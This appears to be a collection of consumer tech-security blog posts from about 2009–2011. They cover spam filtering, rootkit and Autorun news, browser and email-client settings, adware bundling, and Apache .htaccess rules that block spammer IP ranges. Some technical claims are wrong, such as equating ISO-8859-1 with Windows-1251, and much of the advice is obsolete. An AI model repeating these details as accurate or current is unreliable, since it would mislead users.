"Text" is the (combination of) letters, numbers, punctuation marks and spaces that form the human or "text-to-voice" readable words, prices, addresses, distances, ages, and other descriptions that can be read on a page, whether printed or electronic. This assumes that one has had "book learnin'!" Text is not images, or YouTube movies, or banners ads, or logos, or audio files. Text is what is used to cipher readin', writin' and 'rithmetic!

Let's get on with the copying and pasting...

Continue reading "Tutorial on how to copy and paste text" »

Posted by Wiz at 11:29 PM | Permalink

back to top ^

Prologue

Recently, I have published blog articles describing spam emails containing links to disreputable URLs. I have mentioned in these articles that one means of self defense against visiting obviously bad locations is to hover over a link and read the actual URL of that link - in your email client "Status bar." But, what if there is no Status bar showing in your email reader? How do you reveal it?

This brief technical article will show you how to show a hidden "Status Bar" on the most commonly email clients (in 2011). It also explains why having this bar visible is so important and a brief tutorial on making sense of the details that are displayed when one hovers over a link with their mouse pointer.

Displaying Email Client Status Bars

If you still have Windows XP (or, earlier; shudder the thought), you may have Microsoft's Outlook Express as your default POP3 email client. Others using XP, or Vista, have gotten the message about Outlook Express being deprecated (abandoned) by Microsoft and have moved up to Windows Live Mail (aka: WLM). People using Windows 7 are only offered Windows Live Mail 2011 (and newer, yet to come versions). All three versions have the means of turning the Status Bar on and off.

To show or hide the Status Bar in Outlook Express, Windows Mail (Vista only) and Windows Live Mail for XP and Vista, open the program, go to the menu bar item View, then click to place a check mark in Status Bar. It's that simple!

If you use Windows 7, your version of Windows Live Mail is probably version 2011 (or newer version, yet to come). Your interface is different than Outlook Express and the WLM for XP. To show the Status Bar, open the program, click on the "View" button in the row under the Title Bar, go to the right side and click the button labeled Status Bar. It appears (or disappears) instantly. Done!

If you are using Mozilla Thunderbird as your email client and for some reason the Status Bar is hidden, you can bring it back thusly: go to View > Toolbars > Status Bar and click to check it. The Status Bar will appear instantly.

Other email clients will have their own methods of turning the Status Bar on and off. I recommend leaving it on, all the time. Here's why...

Continue reading "How to display and use the statusbar in your email client" »

Posted by Wiz at 3:42 PM | Permalink

back to top ^

Most people who see an obvious spam email message, based on the "Subject" or "From" fields, just delete it on sight. I often go one step further and examine the normally hidden source code. This gives me an insight into some tricks employed by criminals to get their spam messages past the spam filters used by many ISPs and email providers. This helps me to develop new, or modify existing spam filters that I publish for MailWasher Pro users.

I have seen many changes in spam composition tactics over the years I have spent fighting spammers. One trick that used to be prevalent a few years ago is making a big comeback right now. That is the use of "ISO Encoding" for the Subject, From and sometimes other fields in the normally hidden email headers. This type of encoding has legitimate uses and senders (like Yahoo), so don't rush to premature conclusions and block everything containing an ISO subject.

What is ISO encoding and why do spammers employ it as an evasion tactic?

ISO is the World-wide International Organization for Standards that establishes common standards for all manner of interoperable systems that are used around the World, to allow them to interact with one another. This includes the standards of email systems and the coding used in email messages. One of the email standards established and defined by ISO is the email header "Codepage" encoding system. This system is used to tell an email client (program/reader) what language the message is written in and how to render the contents when it is opened.

The default Codepage system used in English language email messages is known as ISO-8859-1. It corresponds to the "Latin-1" and "Windows 1251" character sets. If an email is composed without any declaration of Codepage, and is sent through a mail servers assigned to Western languages, it is automatically displayed in English, using the default display of the user's computer.

Since email composed in one language locality is frequently sent to recipients with a different language and alphabet, senders can specify that they are asking those messages to be displayed in the language and alphabet of the recipients. This is where the use of ISO encoding in the email headers comes into play. It is used frequently by International companies in email blasts to numerous recipients around the Globe.

Spam email also benefits from ISO encoding. Here's how:

Many free email systems, like Microsoft's Hotmail, are plagued with "bots" used by spammers to break security challenges (e.g. CAPTCHA), open new free mail accounts using bogus information, then send out spam blasts to the recipients listed in spam databases. They spammers may get only one or two successful spam runs before they trigger alarms at the email provider and the account gets shut down. But, to ensure that the spam actually gets out at all, they have to make sure it isn't blocked by the outgoing email server's spam detection filters. In English speaking Countries, the default spam filters are written in English and match English language words and phrases.

Spammers using these free email providers have learned that one of the easiest ways to avoid having spam messages blocked by outgoing filters is to not use English words and phrases in the From, Reply, or Subject fields. Instead, they are resorting to the use of ISO encoding tricks. The outgoing spam filters look at the hidden headers and well as a snippet of body text, looking for significant matches. Many incoming mail servers also use the same spam detection systems. By using ISO encoding in the From and Subject, one can sneak spam words past many common spam filters.

Once these messages arrive in recipients' inboxes, their email program ("client"), or web-mail browser, translates the ISO codes into the language specified in the Codepage declaration. In the case of ISO-8859-1, the displayed words will be in standard American English. The recipient does not see any of the coding tricks, just the decoded letters and words. The message slipped past anti-spam filters at the sending end and at the receiving email server, both of which look at the headers first and then so many lines of the body text.

Most of the ISO spam messages also use ISO or other encoding tricks, gibberish (salad words) and non-displaying text hidden inside html style tags, in the beginning of the body, moving the actual spam words and links way down, past where most commercial spam filters give up.

If you want to learn more about the use of ISO encoding, as it pertains to spam filters and email, read my extended content.

Continue reading "Spammers are using ISO encoding, in Subject and From, to evade spam filters" »

Posted by Wiz at 1:41 PM | Permalink

back to top ^

On June 22, 2011, a Microsoft researcher published disturbing findings about a new variant of a rootkit named "Popureb" - by Microsoft's Malware Protection Center. This variant, dubbed Popureb.E is a Master Boot Record (MDR) infector, as were its predecessors. But, this variant is different than the others in that it has a unique defense against being removed by the usual methods.

Rootkits are bad news for those whose computers are infected with them. The hide deep inside the operating system and act as puppeteers for other badware files. Rootkits can act as downloaders of malware and upgrades to it, as spam engines, and protectors of the malware programs they have installed. They can even act as a strange kind of anti-virus, by uninstalling rival malware files.

"Kernel mode" rootkits can usually be removed by using advanced anti-virus program modules that stop the rootkit process in memory, enumerating its normally hidden files and start-up Registry entries, then deleting them during a reboot cycle.

Boot sector, or MBR rootkits are a horse of another color! Boot sector rootkits are the worst of the worst. They hide in the first sector (0) of your boot hard drive and are loaded along with the hardware devices, as the computer boots up, before the OS is active. By loading at the beginning of the boot-up cycle, MBR rootkits, also known as "Bootkits," are able to evade detection by normal anti-virus programs. Even if detected, removal often requires rewriting the MBR, which overwrites the bootkit code with legitimate start-up code.

The most common way to remove standard MBR rootkits and other sector 0 infectors, is to use any preinstalled recovery console, or repair options that exist on that PC. Windows XP and 2000 had an installable Recovery Console, which was added to the boot options menu. Windows Vista and Windows 7 install repair options that become accessible when you restart and tap the F8 key repeatedly. This option is called Repair Your Computer.

So, let's say you have an XP, Vista or W7 computer that acquires a boot sector infector and you have either the Recovery Console, or Repair Your Computer option available during the initial boot cycle. If you go into one of those options from the boot menu or F8 boot options, and choose to "repair your startup files" (Vista/7), or use the Recovery Console, to rewrite the MBR (FIXMBR), will it kill the newest bootkits? Not if it is the one dubbed "Popureb.E."

Continue reading "New variant MBR rootkit removal requires Windows or repair disk" »

Posted by Wiz at 11:27 AM | Permalink

back to top ^

According to a Microsoft Technet Blog article published on June 14, 2011, Malware infections resulting from exploits involving Autorun (like when you plug in a USB memory device and it runs a program or setup automatically) have dropped by 82% from the numbers recorded during the same period in 2010.

The percentage of decline varied with the operating system and service pack installed. Windows XP users who have Service Pack 3 installed saw a 62% drop in Autorun installed malware, after accepting the optional patch issued on Feb 8, 2011, or the forced installation of the reissued patch, pushed out on February 24, 2011.

If you are operating a Windows XP computer with any service pack older that SP 3, your version of Windows is now out of support and you are no longer receiving any critical patches. Thus, your computer is not protected against this, or any other recently patched vulnerabilities. If it is connected to the Internet, or if you plug in an infected USB device, unless you have manually edited your computer's Registry to disable Autorun, or it is running industrial strength anti-malware protection, it will eventually become infected and probably botted.

Computers running on Windows Vista with SP1 saw a 68% decline, while those with SP2 installed had a whopping 82% drop in malware installations.

Note! Microsoft will stop supporting Windows Vista Service Pack 1 on July 12, 2011. From that date onward, Microsoft will no longer provide support or free security updates for Windows Vista Service Pack 1 (SP1). You folks need to upgrade to Vista SP 2 by July 12, 2011, or you will not receive any more updates or patches.

Why have Autorun infection rates dropped so dramatically?

The drop in malware infections from Autorun exploits is attributable to patch KB971029 that Microsoft released optionally, with the Windows Updates of February 8, 2011, which turned OFF Autorun for "non-shiny" media (e.g. CDs, DVDs) and two weeks later, as a non-optional update. Before then, if you plugged a USB stick (a.k.a. thumbdrive, flash drive) into your Windows XP or Vista computer and there was a setup file on that memory device, it would run automatically. With the update installed, flash drives inserted into a PC running XP (SP3), or Vista no longer offer the option to run programs. However, the demise of AutoRun does not affect CDs or DVDs (just USB devices or shared network drives).

Some notorious infections went so far as spoofing the wording of options on the dialog box that usually opens when you plug in a USB device. The wording was crafted to induce unwary users into choosing the spoofed option, which was rewritten to appear that if clicked upon, it would open the drive as a folder, for them to look at. In fact, that option was still there, as the next option down! The first one executed a hidden file on the device, named "autorun.inf" - which triggered a hidden executable file on the drive, which was a malware/spyware setup file. Because of its being the first choice and the craftiness of the wording, many thousands of intelligent people were fooled into clicking it and installing the malware contained on those devices.

It was by means of infected thumb-drives that allowed the Conficker Worm to spread so widely and quickly in late 2009 and early 2010.

Continue reading "Windows malware infections from Autorun exploits down by 82% from 2010" »

Posted by Wiz at 12:00 PM | Permalink

back to top ^

With the Black Friday Christmas 2010 season about to kick off, many people will be getting brand new Windows 7 computers, to replace their old XP and Vista computers. If you are getting a new computer to replace your old one, but want to keep your installed programs and settings, LapLink's PCMover is the easiest way to accomplish this task.

PCMover is a software program that you install on both the old and new computers. The computers must be connected by some means, either by a network connection, or LapLink crossover cable. Your files, settings and program installations will be transferred over that connection, from the old, to the new PC.

PCmover is the ONLY software that moves programs, files and settings from your old PC to your new PC - even restore from an image (or old hard drive) or perform an in-place upgrade.

The easy-to-use wizard will guide you in selecting which programs, files and settings you want on your PC. When complete, your new computer will have the personality and functionality of your old PC. And, PCmover is safe. it removes nothing from your old PC, and won't overwrite anything on your new PC, plus it includes an easy "Undo" feature.

I have written an entire web page describing PCMover, along with links to buy it (and a LapLink cable if needed). This is a licensed per use program, where you pay for each move you want to perform. Additional licenses are available at discounted prices, for people with multiple computers being replaced.

PCMover Home, selling for $39.95, moves all of your programs (no selections) at once, plus all of the files and settings of the logged in user performing the move. In contrast, PCmover Professionalâ„¢ automatically moves all the programs, licenses, files and settings that you select, along with all user profiles and settings, from your old PC to your new one and all of your applications will be installed automatically ready to use. It even moves use accounts joined to network Domains.

Black Friday through Cyber Monday Super Discount Announcement

If you read this article between November 25 and November 29, 2010, you can save a whopping 50% off the regular price of PCMover Professionalâ„¢. The normal price for the Professional version is $59.95, but it is on sale through my links for only $29.95. This makes the Professional version $10 cheaper than the more limited Home version! This sale price runs from 12:01 AM Nov 25, through 11:59 PM Nov 29, Pacific Time Zone. I hope you don't miss out on this deal!

Posted by Wiz at 12:18 AM | Permalink

back to top ^

Update: As of the late evening of October 15, 2010, Facebook listened to our petition and has restored the link to Clear Chat History! Chalk another one up for the Good Guys! The link is in the top right of your Facebook Chat boxes. It only works on your end. If you want your chat partners to clear their side, ask them to do so. Otherwise, your comments remain online.

Updated with more details, on October 15, 2010, at: 10:45 AM, EST.

At the time I am writing this, Facebook does not have a means of clearing your Facebook Chat history. It is preserved over an undisclosed period of time, so that every time you close the browser, then open it again and login to Facebook, then open a Chat with a Friend, your previous chat history will still be present. This is a serious security and privacy risk. If somebody else uses your computer, and opens the same browser and goes to your Facebook page (Facebook automatically logs you in every time!), they can open the Chat box and click on names of your Friends. Each Friend with whom you have recently chatted will reveal the entire chat history, until the Facebook servers finally delete it.

If the person reading your Facebook page is your employer, or a spy, or a jealous companion, they can read every word exchanged between you and your Chat partners. If you allow third party Facebook applications to access your profile, they can also access your chat history!

There is an ongoing petition, based on Facebook members "Liking" the topic, about getting Facebook to reinstall the previously present, now removed link to delete individual chat histories. I have posted several comments about this matter. Now, there is a workaround being discussed, involving a snippet of JavaScript and copying/pasting it into the browser's address bar while viewing a Chat partner's profile. It is confusing to the less technically savvy Facebook users. I shall try to 'splain it in plain English.

Here is part of what a Facebook member posted. It works for me and some others, but confuses the hell out of too many members.

have the chat box of the person you're chatting with open or minimized. go to their profile.
{snip}
copy and paste the line below and replace their id in the address bar with the number after id= and hit the enter key. {snip}

javascript:chatDisplay.tabs[id].clearHistory();

I just tested that (full) procedure and it worked as advertised, but took extra steps that were not described in detail. Here are the actual steps I took, in outline form:

1. With the Chat box open and the Chat history present, right-click on that person's small photo inside the Chat box;


2. From the flyout right button options, use the left button to select "Open in new tab" or else "Open in new window", depending on if your browser allows you to use new tabs for opening hyperlinks.


3. Look at address bar on the new browser tab or window, where the link from the profile picture opened. The address bar or location bar as it's called in Firefox, is where the URL of a web page is shown. E.g.: http://whatever.com. On right half of the Facebook URL there is "/profile.php?id=" - without the quotes, and either their Facebook user name or a long series of numbers;


4. Click the mouse pointer on the first number after the = symbol, hold down left mouse button, then wipe mouse to the right, across all the rest of the member's name or numbers, then let go of mouse button;
   
   Example: If the address bar shows /profile.php?id=123456789012345, you would want to highlight just the group of numbers I have underlined. If the ID is the actual member's name, rather than a number code, copy it instead.


5. Press CTRL and C together on your keyboard, to copy the now highlighted user id name or number


6. Open Notepad, or another text editor.
   
   Windows method: Right-click your mouse or pointer anywhere in a blank area of your desktop display and hover the pointer over New, then move sideways to the little down arrow that appears and go down the list of options until you highlight Text Document. With your left mouse button, click to select Text Document. This will open a blank instance of Windows Notepad.
   
   Now, paste in the copied name or numbers by pressing the CTRL and V keys together.


7. Hit the Enter key to create a new line in the new Notepad document window


8. Highlight, Copy (Ctrl and C) and Paste (Ctrl and V) this code into a new line in the Notepad document:
   
   javascript:chatDisplay.tabs[id].clearHistory();


9. Highlight and delete the letters [id] inside the square brackets, but not the brackets themselves.


10. Highlight and re-copy the ID name or numbers you copied and pasted into Notepad, in step six (from the member's Facebook ID)


11. Paste those numbers inside the square brackets where the word "id" was before you deleted it. Here's how it would look in my example id:
    javascript:chatDisplay.tabs[123456789012345].clearHistory();


12. Now, copy and paste that code, but with the member's actual name or ID number in the brackets, into the address bar where that member's profile page was opened, in step #2, overwriting the existing facebook.com URL. You must replace the URL that was in the address bar with this code. Do not just add it in.


13. With that JavaScript code in the address or location bar, press the ENTER key. If the Chat box is open on the other person's profile page, you will see the entire chat history disappear in front of your eyes!

Instructions for newbies, for copying and pasting, are in my extended comments, below.

Continue reading "JavaScript workaround to clear Facebook Chat history" »

Posted by Wiz at 1:24 AM | Permalink

back to top ^

In early July, 2010, Firetrust, the makers of the famous anti-spam program: MailWasher Pro, released a brand new version. The new MailWasher 2010 was several years in the making and touts a new user interface, new spam weighting system and a brand new spam filter format.

Previously, MailWasher spam filters were in a plain text file, aptly named "filters.txt" - with each filter on a long separate line, ending with a line feed, but no blank lines between them. Some filters have many individual rules and trying to read and debug them is a challenge. The new version uses a well formed XML format, with indented sections and rules. This is a visually pleasing layout that is easy to read and edit, rule by rule. However, because each rule and condition is on a separate line, the file size is much larger than the old flat text file filters.

As many of you know, I write and publish spam filters for use in MailWasher Pro. I have been writing and updating these filters for years. But, with the release of the new MailWasher 2010, a lot of work was needed to convert the old filter format into the new one. The good news is that as of today, August 22, 2010, I completed the conversion and placed the new "Filters.xml" online. You can view and download them from my aforementioned Custom Filters page

If you already know where to save downloaded filters you don't need this article. Otherwise, you need this information to learn where to save updated filters. Where you save your filters file depends on both your operating system and the version of MailWasher Pro you have installed. Some, like me, use both the old and new versions simultaneously. I continue using the previous version 6.5.4, because it contains direct reporting of spam to SpamCop, for reporting members. And, the previous version has full-featured Mail Statistics and Spam Categories charts. I use the statistics and percentages reports in my weekly spam analysis articles, published on this blog, every Sunday (see my Spam and Email categories). These features are going to be added to the new version 2010 of MailWasher, at which time I and others will stop using the previous version.

If you are here out of curiosity, you can learn more about MailWasher Pro, or try it, or buy it here.

Let's move on with the locations of your spam filters, for various operating systems and versions of MailWasher Pro...

Continue reading "Where to save my updated MailWasher Pro spam filters" »

Posted by Wiz at 1:38 PM | Permalink

back to top ^

Starting with Firefox 3.6.4, Mozilla added a new feature called Crash Protection. This feature watches over three (initially Flash, Silverlight and Quicktime) plug-ins and isolates their tabs, if or when a supported plug-in crashes. Since the browser itself survives the crash, It is possible to reload that tab and hopefully, load the affected plug-in correctly.

However, soon after Firefox 3.6.4 was released, numerous complaints began arriving at Bugzilla, claiming that the new crash protection was making it impossible for those affected to play "Farmville." Apparently, the timeout for detecting a crash was too short, and Farmville was taking too long to load its Flash presentations. The page would halt loading with this message: "The Adobe Flash plugin has crashed."

To rectify the problem Mozilla rushed out Firefox 3.6.6, with a higher timeout of 45 seconds. That should fix the timeout problem for hi-speed broadband customers, but those on low speed broadband (e.g. mobile broadband modems, smartphones, netbooks), less than stellar satellite Internet and dial-up Internet services will still be affected by these timeouts. So, here is a manual workaround that allows you to specify a new timeout value, or even disable the crash protection completely.

How to disable or increase plug-in hang protection in Firefox 3.6.4+

You can disable hang protection to prevent Firefox from killing a hanging plug-in process, regardless of how long it's taking. Crashes in the plug-in will still be caught and will not terminate the browser process.

1. In the Location bar, type about:config and press EnterReturn.
   * The about:config "This might void your warranty!" warning page may appear. Click I'll be careful, I promise!, to continue to the about:config page.
2. The about:config page should appear. In the Filter box, type, or copy and paste: dom.ipc.plugins.timeoutSecs
3. Double click the setting and change the number to -1 to disable hang protection.
4. To maintain crash protection, change the value to a higher timeout, in seconds.
   ** Example: "45" means Firefox waits 45 seconds before declaring that a plug-in has crashed and halts the loading of the page.

You can apply this technique anytime an important web page is hanging because a plug-in is taking too long to load and Firefox declares that it crashed. You can undo your changes by lowering the timeout for normal crash protection.

Posted by Wiz at 4:35 PM | Permalink

back to top ^

I don't know if a Botnet has been mis-programmed, or if some Russian spammers have mistaken my domain for a Russian speaking domain, but I am seeing huge amounts of unreadable Russian language spam over the past month. However, I doubt that I am the only totally English speaking person in the USA who is getting this unintelligible Cyrillic spam.

The why's are unimportant to me, or to you, if you are also getting foreign language spam. A few years ago I was getting Chinese language spam, which is totally weird to look at. Both the Russian and Chinese alphabets look like something out of Star Trek to me. Most people are annoyed when they get any spam at all. But, getting spam you can't even read is worse. Since I can't read the content I have no use in looking at this crap, so I have created spam filters to automatically delete it off my email servers, and I will share them with you.

I have certain systems in place to filter out spam before I download it, but you all might have altogether different measures in place. I will outline my countermeasures, then suggest others that you may be able to use.

My primary tool in the war to secure my inbox is an anti-spam program called MailWasher Pro (MWP). It is a desktop application that intercepts all incoming POP3 email, from all of the various email servers that I use to get and send email. In my extended comments I will reveal two powerful filters that I have created, which combined will automatically delete 100% of the Cyrillic coded spam sent to my various POP3 accounts.

My second tool is my desktop email client; Windows Live Mail (WLM). This is the most recent child of the no longer supported Outlook Express email client, from Microsoft. Outlook Express died when Windows Vista was released. At the same time, Windows Mail was included with Vista. With the advent of Windows 7, Windows Live Mail is the only email client available from Microsoft, as an optional download. Unlike Outlook Express, Windows Live Mail includes a junk filter module, which receives updates from time to time. You can also block incoming messages from your inbox by applying the new "International" filter, which reads the sender's From address or language encoding. If the domain listed in the From field, or the text coding matches one on the blocked countries list, it automatically goes to the Junk Mail folder, or is automatically deleted, according to your choices.

The previous anti spam countermeasures are for people using a POP3 or IMAP desktop email client to download, read, compose and send email. But, many people are still using browser based email systems, like Hotmail, Yahoo, AOL, Comcast, Charter, and other proprietary mail systems from free mail providers, or from their web hosting companies. You folks must search out and apply any junk mail rules available from your email service. I will show you how to apply junk filters to Yahoo and Hotmail, using your web browsers.

Most web hosting accounts now come with the option to enable Spam Assassin. You can turn on Spam Assassin and add the regular expression to block any "From" address containing the domain .ru

Continue reading "Blocking Russian language spam with junk filter rules" »

Posted by Wiz at 11:31 PM | Permalink

back to top ^

For a while now, the freeware Foxit PDF reader, an alternative to the also free and much exploited Adobe Reader, has been shipping bundled with the ASK search engine toolbar. Foxit is doing this because they get paid a commission for each installation of the Toolbar, by Ask.com, which helps offset the cost of developing and updating the Foxit Reader. Ask is a search engine, formerly known as "Ask Jeeves," which has been losing its popularity over the last several years. In an effort to improve their sagging search engine ranking, they have ramped up their partnerships with various software designers who are paid to include the Ask Toolbar in their program installers. In the Foxit PDF reader installer, this toolbar is also called the "Foxit Toolbar, Powered by Ask.com." In the terms of use license that most people usually agree to without reading, the option to install this toolbar is pre-checked by default. Many users of Foxit are used to simply accepting the default options when installing or updating the Foxit software. If you do allow the toolbar to be installed, the terms of Ask Toolbar service is displayed to you, beginning with these words:

"We reserve the right to add additional features or functions to the existing Toolbar. When installed on your computer, the Toolbar periodically communicates with our servers.We may require the updating of the Toolbar ... This update may occur automatically."

The installation options warn that if you opt out of installing the "Foxit" toolbar you lose the Typewriter Tools, Text Viewer and Text Converter. This results in a lot more users allowing the Ask Toolbar to be installed than might have otherwise been the case. But, if someone wanted to remove it afterward, or disable it, there was no problem in the past.

However, as of April 2010, Foxit has been altered in the way the Ask Toolbar gets installed, so that it cannot be uninstalled in a simple fashion. According to Ellen7, on a Foxit Corporation Forum, when a user asked how to permanently remove the advertising and Ask Toolbar from the browser, after it was installed with a recent Foxit security update, her reply was: "sorry, the current version can not remove, but will be remove in the next version." (sic). Another person on that forum was told by the Forum Administrator that the current version does not allow you to remove the Ask Search from Foxit, but the next version will allow that option, as well as the removal of the browser toolbar and search changes that are forced by this version (Foxit Reader 3.2.1.401).

Furthermore, people have discovered that even if you uncheck the toolbar option during setup, it is still getting installed, or at least keeps trying to install itself, even when you tell Scotty to block it! Then, when they try to remove it, it remains in their browsers, including the current version of Firefox. Once installed, your default search engine is forcibly changed to Ask.com. Normal procedures to switch back to Google or Yahoo are met with resistance by the Ask Toolbar, which remains active even if you uninstall it via Control Panel, or via the Add-ons utility in IE and Firefox.

Freeware software that bundles advertising and toolbars that are difficult to remove, or the removal of which break the functionality of said programs, are known in the security business as "Adware." Adware that sends home details about the browsing history of users is also sometimes called "Spyware." Programs that fall into this category are also affectionately referred to as PUPS, meaning Potentially Unwanted (or Unpopular) Programs. Most anti spyware programs will detect such applications and remove them from your PC during or after a scan, if you choose to have them do so. Some of the better known anti spyware programs that remove Adware and PUPS include Spybot Search and Destroy, Ad-Aware, and Malwarebytes Anti-Malware (a.k.a: MBAM, which also removes most really nasty spyware, rootkits, keyloggers and fake security alerts).

Instructions for manually resetting your search preferences in Internet Explorer and Firefox are found in my extended comments. Use them if the Ask Search Toolbar has hijacked your desired search engine in your browser.

Continue reading "The Foxit PDF reader is becoming an Adware supported P.U.P." »

Posted by Wiz at 5:02 PM | Permalink

back to top ^

For the past few days I have discovered that a script, or person operating a server farm, at Ubiquity Server Solutions, is attempting to post spam trackbacks to my blog. I don't even allow trackbacks on my blog, for this very reason, yet, this spamming idiot keeps blasting away with his script, ignoring a constant flow of Server 403 (Forbidden) responses. The page that the spammer is trying to POST to is no longer on the blog database, having been deleted in the spring of 2006! So, he is wasting his time and amusing me as I look at all the IP addresses I can add to my Exploited Servers Blocklist.

In fact, I have discovered that this blog trackback spammer is using a server farm assigned to Ubiquity Server Solutions, in Seattle, Washington, USA. Their full assigned CIDR is 64.120.4.0/22, covering IPs ranging from 64.120.4.0 through 64.120.7.255. However, to be fair to this clueless hosting service, the spammer is rotating through a group of servers with IP addresses only in the range of 64.120.5.0 - 64.120.5.255. To minimize possible collateral damage to innocent hosting customers, I am only blocking the narrow range encompassed by the CIDR 64.120.5.0/24.

UPDATE
November 20, 2009

Ubiquity Servers is now hitting MovableType blogs with trackback spam exploit attempts from a different CIDR: 174.34.144.0/23. I have updated the evidence and blocklist rules below to include this new CIDR.

The evidence:

174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
174.34.145.117 - - [19/Nov/2009:15:16:17 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

64.120.5.197 - - [18/Nov/2009:07:07:08 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.254 - - [18/Nov/2009:07:49:48 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.236 - - [18/Nov/2009:08:22:27 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.196 - - [18/Nov/2009:08:30:16 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.225 - - [18/Nov/2009:08:49:54 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

Enough already! You will notice that the spammer is only attempting to POST to two items. One is identified as blog entry number 18, which dates back to May of 2006 and was deleted from my blog in early 2007. The other target of this hapless spammer is an article I wrote about "Stupid Blog Trackback Spammers"not understanding a 403 Forbidden response, when they try to post trackback comments to a blog that has all trackbacks and comments disabled! There are no trackbacks or comments allowed on my blog! Spammers cannot POST anything!

I find this amusing, but others who do allow trackbacks or comments may not be so amused by this a-hole, whom I previously may have traced to Romania. If your website is hosted on an Apache web server, you can serve him a steady diet of Server 403 Forbidden responses by blocking his IP CIDR and his user agent in your public web root .htaccess file, as demonstrated below.

---

<Files *>
order deny,allow
deny from 64.120.5.0/24
deny from 174.34.144.0/23
</Files>

Options +FollowSymLinks
RewriteEngine On
RewriteOptions inherit
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} ^tbr/0\.1\.0$
RewriteRule .* - [F]

---

You should determine if legitimate visitors to your blogs are using the tbr/0.1.0 user agent. If so, don't block it. In all likelihood, only spammers use that tool with that version number.

Details about the .htaccess file are found in my extended comments.

Continue reading "Block trackback spammer operating on Ubiquity Server Solutions" »

Posted by Wiz at 2:16 AM | Permalink

back to top ^

When it comes to hackers and cyber criminals using leased, co-located, or hijacked web servers to attack other web servers, one of the top culprits I see in my daily access logs is traceable to ThePlanet.com, based in Dallas, Texas. More server attacks originate from their IP addresses during any givien week than from anywhere else. This has been the case for at least three years in a row.

When I say "server attacks" I am referring to attempts to hack a web server, or website, by sending codes to it that are designed to exploit unpatched versions of software commonly used by website owners. Most attempts involve trying to upload or inject a hostile file to a PHP script that is known to be exploitable. These are known a PHP Injection Exploits. Of those targeted scripts, the one that I see almost every day, in my access logs, is the Coppermine Gallery script. Hardly a day goes by that some script kiddie, or hacker, or bot tries to upload or inject hostile files to my server via Coppermine exploits, as demonstrated in the following actual log entry:

We can use DNSStuff or DomainTools to run a WhoIs lookup on that IP address...

WHOIS - 70.85.136.34
Location: United States [City: Dallas, Texas]
OrgName: ThePlanet.com Internet Services, Inc.
NetRange: 70.84.0.0 - 70.87.255.255
CIDR: 70.84.0.0/14

Definition of CIDR
In the above results, the last item shown is the CIDR of the entity in question. CIDR stands for "Classless InterDomain Routing." It is designated by appending a forward slash and number to the end of a starting IP address, to designate an entire range of IPs assigned to that entity. In this case, 70.84.0.0/14 covers all IPs between 70.84.0.0 trough 70.87.255.255.

The CIDR covering ThePlanet.com is shown to be 70.84.0.0/14, but they have other assigned CIDRs that are used by hackers and spammers. All pertinent CIDRs that I have discovered to this date for ThePlanet.com are listed further down in this article, in "deny from" rules, which are referred to as a "blocklist." I have also thrown in IPs belonging to Everyone's Internet and Rackspace, both favorites of spammers and hackers. Any IP address that is covered by one of the CIDRs in the blocklist will get a server 403 Forbidden response, no matter what page they try to view on a website that employs these rules.

Furthermore, I have included a ".htaccess" "Mod_Rewrite" rule to block the exact user agent "Mozilla/5.0" - which is a known hacking tool. Read on and learn to how protect your Apache web server, or Apache hosted websites, from exploit attacks coming from ThePlanet and the like, or Mozilla/5.0 hack tools.

Continue reading "Block server exploit attacks coming from ThePlanet IP space" »

Posted by Wiz at 2:33 AM | Permalink

back to top ^

On September 1, 2009, Microsoft changed the way their Hotmail email servers communicate with POP3 - SMTP desktop email clients. As of this day you cannot send or receive Hotmail through Outlook Express, period; finito, kaput! You must change to a different desktop email client, like Windows Live Mail. Microsoft Outlook users can download and install the Microsoft Outlook Connector to continue to access Hotmail. The details about these changes and what you need to do follow.

If you use Microsoft Office Outlook to send and receive through Hotmail, you can download the free Office Outlook Connector to continue accessing your Windows Live Hotmail within Outlook 2003 or 2007. If you run an older version, read this information.

If you use Outlook Express (OE) to view Hotmail, you can choose to download the free Windows Live Mail (WLM), which resembles Outlook Express, but is much more powerful, less prone to crashes and contains a junk filter. You can import all of your saved .eml messages and accounts from OE into WLM (via Export/Import, or drag and drop between email clients). You can also import your personal folders from OE. The view is a little different, but you'll get used to it. You can find help on this page with exporting messages from Outlook Express into WLM.

If you are using Entourage to send and receive Hotmail, read these instructions to continue connecting to the new servers.

New Mail Server Names:
There are also changes to the names of the Hotmail POP3 and SMTP mail servers, which now use a technology known as "Delta Sync." The new incoming POP server is: pop3.live.com and the new outgoing SMTP server is: smtp.live.com. You must also change the incoming and outgoing ports, as outlined in my extended content, under "New mail servers and ports."

Continue reading "Hotmail POP access method changed on Sept 1, 2009" »

Posted by Wiz at 2:51 PM | Permalink

back to top ^

About Spybot Search & Destroy

Spybot Search & Destroy (S&D), a product of Safer Networking Ltd., is a free ("donation-ware") security program that is used by millions of people to fight off spyware, keyloggers, Trojans, Botnet executables, adware, hostile domains, unwanted cookies and other types of malware in the wild. Being freeware it lacks some functions that are commonly implemented in commercial security programs. It has only manual updates, which are usually released once a week, on Wednesdays (see my regular weekly articles about new updates), and limited scanning presets. Most functions must be carried out manually, but hey, it's free! Despite these limitations Spybot S&D is a well respected and effective anti-malware tool to add to your arsenal.

Spybot Search and Destroy can be downloaded for free from either www.spybot.info, or from www.safer-networking.org, or several official mirror sites. Don't fall for fake versions distributed by rogue anti spyware websites. Approved download mirror sites are listed on the Spybot S&D downloads page.

